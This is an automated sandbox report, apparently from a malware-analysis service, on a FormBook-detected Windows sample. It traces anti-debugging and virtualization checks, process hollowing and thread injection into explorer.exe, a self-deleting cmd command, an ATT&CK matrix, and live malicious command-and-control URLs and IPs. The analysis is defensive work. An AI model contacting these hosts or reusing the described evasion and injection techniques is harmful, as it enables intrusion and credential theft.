          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01688B28 mov eax, dword ptr fs:[00000030h]4_2_01688B28
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694B00 mov eax, dword ptr fs:[00000030h]4_2_01694B00
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]4_2_0163EB1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EEB20 mov eax, dword ptr fs:[00000030h]4_2_015EEB20
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EEB20 mov eax, dword ptr fs:[00000030h]4_2_015EEB20
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0BCD mov eax, dword ptr fs:[00000030h]4_2_015C0BCD
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0BCD mov eax, dword ptr fs:[00000030h]4_2_015C0BCD
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0BCD mov eax, dword ptr fs:[00000030h]4_2_015C0BCD
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164CBF0 mov eax, dword ptr fs:[00000030h]4_2_0164CBF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E0BCB mov eax, dword ptr fs:[00000030h]4_2_015E0BCB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E0BCB mov eax, dword ptr fs:[00000030h]4_2_015E0BCB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E0BCB mov eax, dword ptr fs:[00000030h]4_2_015E0BCB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EEBFC mov eax, dword ptr fs:[00000030h]4_2_015EEBFC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C8BF0 mov eax, dword ptr fs:[00000030h]4_2_015C8BF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C8BF0 mov eax, dword ptr fs:[00000030h]4_2_015C8BF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C8BF0 mov eax, dword ptr fs:[00000030h]4_2_015C8BF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166EBD0 mov eax, dword ptr fs:[00000030h]4_2_0166EBD0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01674BB0 mov eax, dword ptr fs:[00000030h]4_2_01674BB0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01674BB0 mov eax, dword ptr fs:[00000030h]4_2_01674BB0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0BBE mov eax, dword ptr fs:[00000030h]4_2_015D0BBE
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0BBE mov eax, dword ptr fs:[00000030h]4_2_015D0BBE
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0A5B mov eax, dword ptr fs:[00000030h]4_2_015D0A5B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0A5B mov eax, dword ptr fs:[00000030h]4_2_015D0A5B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166EA60 mov eax, dword ptr fs:[00000030h]4_2_0166EA60
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]4_2_015C6A50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]4_2_015C6A50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]4_2_015C6A50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]4_2_015C6A50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]4_2_015C6A50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]4_2_015C6A50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]4_2_015C6A50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163CA72 mov eax, dword ptr fs:[00000030h]4_2_0163CA72
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163CA72 mov eax, dword ptr fs:[00000030h]4_2_0163CA72
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FCA6F mov eax, dword ptr fs:[00000030h]4_2_015FCA6F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FCA6F mov eax, dword ptr fs:[00000030h]4_2_015FCA6F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FCA6F mov eax, dword ptr fs:[00000030h]4_2_015FCA6F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FCA38 mov eax, dword ptr fs:[00000030h]4_2_015FCA38
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E4A35 mov eax, dword ptr fs:[00000030h]4_2_015E4A35
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E4A35 mov eax, dword ptr fs:[00000030h]4_2_015E4A35
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EEA2E mov eax, dword ptr fs:[00000030h]4_2_015EEA2E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164CA11 mov eax, dword ptr fs:[00000030h]4_2_0164CA11
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FCA24 mov eax, dword ptr fs:[00000030h]4_2_015FCA24
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0AD0 mov eax, dword ptr fs:[00000030h]4_2_015C0AD0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F4AD0 mov eax, dword ptr fs:[00000030h]4_2_015F4AD0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F4AD0 mov eax, dword ptr fs:[00000030h]4_2_015F4AD0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01616ACC mov eax, dword ptr fs:[00000030h]4_2_01616ACC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01616ACC mov eax, dword ptr fs:[00000030h]4_2_01616ACC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01616ACC mov eax, dword ptr fs:[00000030h]4_2_01616ACC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FAAEE mov eax, dword ptr fs:[00000030h]4_2_015FAAEE
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0040ACE0 LdrLoadDll,4_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B0828 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001B0828
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B5909 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001B5909
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B0987 SetUnhandledExceptionFilter,2_2_001B0987
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B0D9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_001B0D9B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B0828 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_001B0828
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B5909 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_001B5909
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B0987 SetUnhandledExceptionFilter,4_2_001B0987
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B0D9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_001B0D9B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 108.186.24.175 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.17.26.8 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.17.158.1 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.177.124.40 80Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: DE0000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\xheuzyg.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeThread register set: target process: 4056Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4056Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe C:\Users\user~1\AppData\Local\Temp\xheuzyg.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.1234876566.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077481783.000000000901E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000002.3706308164.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1234021274.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000002.3706308164.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1234021274.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
          Source: explorer.exe, 00000005.00000000.1233732811.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3698889752.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
          Source: explorer.exe, 00000005.00000002.3706308164.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1234021274.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\TempState\VimTemp VolumeInformationJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalCache\RNManualFileCache VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,2_2_001C48BB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,2_2_001C4906
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,2_2_001C49A1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,2_2_001BC9CF
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_001C4A2C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,2_2_001C4C7F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_001C4DA8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_001C460F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,2_2_001C4EAE
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,2_2_001BCEFB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_001C4F84
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,4_2_001C48BB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,4_2_001C4906
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,4_2_001C49A1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: EnumSystemLocalesW,4_2_001BC9CF
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_001C4A2C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,4_2_001C4C7F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_001C4DA8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_001C460F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,4_2_001C4EAE
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetLocaleInfoW,4_2_001BCEFB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_001C4F84
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B0A2C cpuid 2_2_001B0A2C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B0C3B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_001B0C3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API
          1
          DLL Side-Loading
          512
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          1
          System Time Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Masquerading
          LSASS Memory241
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth4
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
          Virtualization/Sandbox Evasion
          Security Account Manager3
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Clipboard Data
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Rundll32
          DCSync135
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1336550 Sample: SecuriteInfo.com.FileRepMal... Startdate: 03/11/2023 Architecture: WINDOWS Score: 100 38 www.xuangesmd.com 2->38 40 www.wokeeducationhateskids.com 2->40 42 13 other IPs or domains 2->42 58 Snort IDS alert for network traffic 2->58 60 Multi AV Scanner detection for domain / URL 2->60 62 Found malware configuration 2->62 64 9 other signatures 2->64 12 SecuriteInfo.com.FileRepMalware.16340.31219.exe 17 2->12         started        15 SkypeApp.exe 2 4 2->15         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...\xheuzyg.exe, PE32 12->36 dropped 17 xheuzyg.exe 1 12->17         started        process6 signatures7 50 Multi AV Scanner detection for dropped file 17->50 52 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 17->52 54 Maps a DLL or memory area into another process 17->54 56 Tries to detect virtualization through RDTSC time measurements 17->56 20 xheuzyg.exe 17->20         started        23 conhost.exe 17->23         started        process8 signatures9 66 Modifies the context of a thread in another process (thread injection) 20->66 68 Maps a DLL or memory area into another process 20->68 70 Sample uses process hollowing technique 20->70 72 Queues an APC in another process (thread injection) 20->72 25 explorer.exe 10 1 20->25 injected process10 dnsIp11 44 www.umertazkeer.com 103.224.212.216, 49719, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 25->44 46 www.sklm888.com 108.186.24.175, 49717, 80 PEGTECHINCUS United States 25->46 48 6 other IPs or domains 25->48 74 System process connects to network (likely due to code injection or exploit) 25->74 29 rundll32.exe 12 25->29         started        signatures12 process13 signatures14 76 System process connects to network (likely due to code injection or exploit) 29->76 78 Modifies the context of a thread in another process (thread injection) 29->78 80 Maps a DLL or memory area into another process 29->80 82 Tries to detect virtualization through RDTSC time measurements 29->82 32 cmd.exe 1 29->32         started        process15 process16 34 conhost.exe 32->34         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.FileRepMalware.16340.31219.exe58%ReversingLabsWin32.Trojan.FormBook
          SecuriteInfo.com.FileRepMalware.16340.31219.exe65%VirustotalBrowse
          SecuriteInfo.com.FileRepMalware.16340.31219.exe100%AviraHEUR/AGEN.1337943
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\xheuzyg.exe58%ReversingLabsWin32.Trojan.FormBook
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.umertazkeer.com12%VirustotalBrowse
          www.wokeeducationhateskids.com9%VirustotalBrowse
          www.klxcv.xyz1%VirustotalBrowse
          td-ccm-neg-87-45.wixdns.net0%VirustotalBrowse
          www.sklm888.com7%VirustotalBrowse
          www.xuangesmd.com8%VirustotalBrowse
          glocraze.com10%VirustotalBrowse
          www.durufilmyapim.com12%VirustotalBrowse
          www.mzfgwh.top1%VirustotalBrowse
          www.townstart.shop11%VirustotalBrowse
          www.gaming-chairs-vn-vi-2885437.fyi11%VirustotalBrowse
          www.glocraze.com10%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://microsoft.github.io/Win2D/html/Introduction.htm)0%URL Reputationsafe
          http://mad4milk.net/0%URL Reputationsafe
          http://www.e9pf4s.top/ju29/100%Avira URL Cloudphishing
          http://www.durufilmyapim.com100%Avira URL Cloudmalware
          http://www.durufilmyapim.com/ju29/100%Avira URL Cloudmalware
          http://www.merchascarpamici.com0%Avira URL Cloudsafe
          http://www.merchascarpamici.comReferer:0%Avira URL Cloudsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.durufilmyapim.com/ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA==100%Avira URL Cloudmalware
          http://www.umertazkeer.com/ju29/www.mzfgwh.top100%Avira URL Cloudmalware
          http://www.sklm888.com100%Avira URL Cloudmalware
          http://www.umertazkeer.com100%Avira URL Cloudmalware
          http://www.merchascarpamici.com/ju29/:100%Avira URL Cloudmalware
          http://www.wokeeducationhateskids.com100%Avira URL Cloudmalware
          http://www.merchascarpamici.com/ju29/100%Avira URL Cloudmalware
          http://www.mnchentampere.com/ju29/100%Avira URL Cloudmalware
          http://www.dwijtechnology.com/ju29/www.klxcv.xyz100%Avira URL Cloudmalware
          http://www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q100%Avira URL Cloudmalware
          http://www.bodacristianyjuani.com100%Avira URL Cloudmalware
          http://www.mzfgwh.top0%Avira URL Cloudsafe
          http://www.xuangesmd.com/ju29/100%Avira URL Cloudmalware
          http://www.xuangesmd.com100%Avira URL Cloudmalware
          http://www.wokeeducationhateskids.com/ju29/100%Avira URL Cloudmalware
          http://www.dwijtechnology.com/ju29/100%Avira URL Cloudmalware
          http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFms100%Avira URL Cloudphishing
          http://www.klxcv.xyz/ju29/100%Avira URL Cloudphishing
